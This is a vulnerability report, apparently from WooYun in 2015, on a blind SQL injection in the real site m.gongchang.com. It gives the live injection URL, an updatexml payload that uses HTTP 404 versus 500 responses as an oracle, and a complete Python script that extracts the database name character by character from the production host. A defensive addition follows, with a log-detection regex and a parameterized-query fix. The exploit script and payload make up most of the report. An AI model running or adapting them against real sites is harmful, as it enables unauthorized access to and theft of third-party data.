
A Particularly Well-Hidden SQL Injection Vulnerability on Gongchang.com (世界工厂网), Script Attached

2015-04-22 12:05

http://m.gongchang.com/shop/syg'or(updatexml(1,if(1=1,1,0x22),1))or'/

1=1 returns 404

1=2 returns 500

The differing status codes confirm that an injection point exists.

Verification script

Code:
#coding=utf-8
# Python 2 script (urllib2, print statement), as published in the report.
import sys, urllib2
from optparse import OptionParser
from urllib2 import Request, urlopen, URLError, HTTPError
import urllib

result = ''


def request(URL):
    #print URL
    user_agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, user_agent)
    try:
        resp = urllib2.urlopen(req)
    except HTTPError, e:
        # The HTTP status is the oracle: 500 means the updatexml() branch raised a
        # MySQL error, 404 means the page was served normally.
        if e.code == 500:
            return '500Runtime Error'
        if e.code == 404:
            return '404Runtime Error'
    except URLError, e:
        #print('[!] We failed to reach a server.')
        #print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
    return resp.read()


def binary_sqli(left, right, index):
    # Binary search over the ASCII range [left, right] for character `index`
    # of database(), one request per comparison.
    global result
    while 1:
        mid = (left + right)/2
        if mid == left:
            result += chr(mid)
            print 'db: ', result
            break
        payload = "'or(updatexml(1,if(mid(database(),%s,1)>%s,1,0x22),1))or'/" % (index, hex(mid))
        #param = {'pid': payload}
        html = request('http://m.gongchang.com/m/shop/syg'+payload)
        print ('http://m.gongchang.com/m/shop/syg'+payload)
        verify = '500'
        if verify in html:
            # error raised: the character is not greater than mid
            right = mid
        else:
            left = mid


if __name__ == '__main__':
    for i in range(1,32):
        binary_sqli(32, 127, i)

Proof of vulnerability:

Retrieved database user:

[Screenshot: 1.jpg]

Retrieved database name:

[Screenshot: 2.jpg]

Fix:

Strictly filter the parameter.
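As an added example (not part of the original report or of the site's code), the following Python 3 snippet shows the defender's side of the 404/500 oracle described above: a detection pass over constructed access-log lines that flags updatexml/extractvalue payloads, and a toy shop lookup in SQLite with the string-formatted query beside a parameterized one, so the payload that yields a 500 against the first returns only 404 against the second. The table, log lines and function names are constructed for this demonstration; SQLite has no updatexml(), so any quote breakout against the vulnerable lookup surfaces as a driver error here.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed access-log lines (not from the report) in the common log format.
SAMPLE_LOG = """\
10.0.0.9 - - [22/Apr/2015:12:05:01 +0800] "GET /shop/syg HTTP/1.1" 200 5120
10.0.0.9 - - [22/Apr/2015:12:05:02 +0800] "GET /shop/syg'or(updatexml(1,if(1=1,1,0x22),1))or'/ HTTP/1.1" 404 210
10.0.0.9 - - [22/Apr/2015:12:05:03 +0800] "GET /shop/syg%27or(updatexml(1,if(1=2,1,0x22),1))or%27/ HTTP/1.1" 500 312
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# MySQL XML functions that raise an error on an invalid XPath: the oracle used in the report.
XML_ORACLE_RE = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)

def flag_xml_error_oracle(log_text):
    """Return (ip, status, decoded path) for requests carrying updatexml/extractvalue."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and XML_ORACLE_RE.search(unquote(m.group("path"))):
            hits.append((m.group("ip"), int(m.group("status")), unquote(m.group("path"))))
    return hits

def make_db():
    """In-memory stand-in for the shop table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shop (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO shop VALUES (?, ?)", [("syg", "demo shop"), ("abc", "other")])
    return conn

def lookup_vulnerable(conn, shop_id):
    # String formatting: a quote in shop_id closes the literal and the rest runs as SQL.
    return conn.execute("SELECT name FROM shop WHERE id = '%s'" % shop_id).fetchall()

def lookup_safe(conn, shop_id):
    # Bound parameter: shop_id is always data, so no quote can escape it.
    return conn.execute("SELECT name FROM shop WHERE id = ?", (shop_id,)).fetchall()

def page_status(conn, shop_id, lookup):
    """Status the handler would emit: DB error -> 500, no row -> 404, else 200."""
    try:
        rows = lookup(conn, shop_id)
    except sqlite3.Error:
        return 500  # unhandled driver error surfaced to the client: the report's oracle
    return 200 if rows else 404
```

With the parameterized lookup every injected input is just an unknown shop id, so the 500-versus-404 difference the script depends on disappears; the log check catches the probing regardless of which status the server returned.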

Source: www.wooyun.org/bugs/wooyun-2015-0109265
